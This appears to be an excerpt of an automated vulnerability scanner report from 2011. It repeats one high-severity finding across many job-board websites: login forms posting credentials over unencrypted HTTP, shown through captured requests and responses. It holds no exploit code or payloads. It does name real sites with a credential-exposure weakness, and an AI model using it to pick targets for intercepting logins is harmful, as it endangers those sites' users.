| GET / HTTP/1.1 Host: www.consultingcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:24:22 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=cd981ht9vh Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:22 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 111912 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.contractm |
| Path: | / |
| GET / HTTP/1.1 Host: www.contractmanageme Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:24:33 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=fsi5mhj568 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:33 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:33 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:33 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:33 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:33 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:33 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:33 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 111832 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.counselin |
| Path: | / |
| GET / HTTP/1.1 Host: www.counselingcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:24:46 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=lgk9crdg1g Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:46 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:46 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:46 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:46 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:46 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:46 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:46 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 149300 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.cplusplus |
| Path: | / |
| GET / HTTP/1.1 Host: www.cpluspluscrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:24:52 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=j0ddtd9qvk Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:52 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:52 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:52 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:52 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:52 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:52 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:52 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 114789 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.customers |
| Path: | / |
| GET / HTTP/1.1 Host: www.customerservicec Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:25:04 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=e126ahin8n Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:05 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:05 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:05 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:05 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:05 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:05 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:05 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 119384 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.dbacrossing |
| Path: | / |
| GET / HTTP/1.1 Host: www.dbacrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:25:08 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=ks0hq7i64r Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:08 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 125721 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.dentalcrossing |
| Path: | / |
| GET / HTTP/1.1 Host: www.dentalcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:25:08 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=od1eunkj1a Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:08 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 111827 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.designing |
| Path: | / |
| GET / HTTP/1.1 Host: www.designingcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:25:17 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=3h4obslpui Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:17 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:17 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:17 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:17 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:17 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:17 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:17 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 122676 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.diversity |
| Path: | / |
| GET / HTTP/1.1 Host: www.diversitycrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:25:25 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=oh70k7g7bb Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:25 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:25 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:25 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:25 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:25 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:25 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:25 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 135908 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.dotnetcrossing |
| Path: | / |
| GET / HTTP/1.1 Host: www.dotnetcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:25:28 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=r5bbu9cr0v Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:28 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:28 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:28 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:28 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:28 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:28 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:28 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 111450 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.ecommerce |
| Path: | / |
| GET / HTTP/1.1 Host: www.ecommercecrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:25:39 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=jkaapevh1e Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:39 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:39 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:39 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:39 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:39 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:39 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:39 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 122922 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.editingcr |
| Path: | / |
| GET / HTTP/1.1 Host: www.editingcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:25:47 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=9718dh1vf5 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:47 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:47 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:47 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:47 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:47 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:47 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:47 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 114100 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.education |
| Path: | / |
| GET / HTTP/1.1 Host: www.educationcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:25:49 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=cv80umbmrn Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:49 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:49 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:49 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:49 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:49 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:49 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:49 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 112625 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.employmen |
| Path: | / |
| GET / HTTP/1.1 Host: www.employmentcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:25:55 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=ep2g7l3vs5 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:55 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:55 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:55 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:55 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:55 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:55 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:55 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 103823 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.energycrossing |
| Path: | / |
| GET / HTTP/1.1 Host: www.energycrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:25:59 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=i3h90hnvar Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:59 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:59 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:59 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:59 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:59 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:59 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:59 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 117799 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.engineeri |
| Path: | / |
| GET / HTTP/1.1 Host: www.engineeringcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:26:03 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=u76d1au7ld Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:03 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:03 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:03 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:03 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:03 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:03 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:03 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 136413 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.entryleve |
| Path: | / |
| GET / HTTP/1.1 Host: www.entrylevelcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
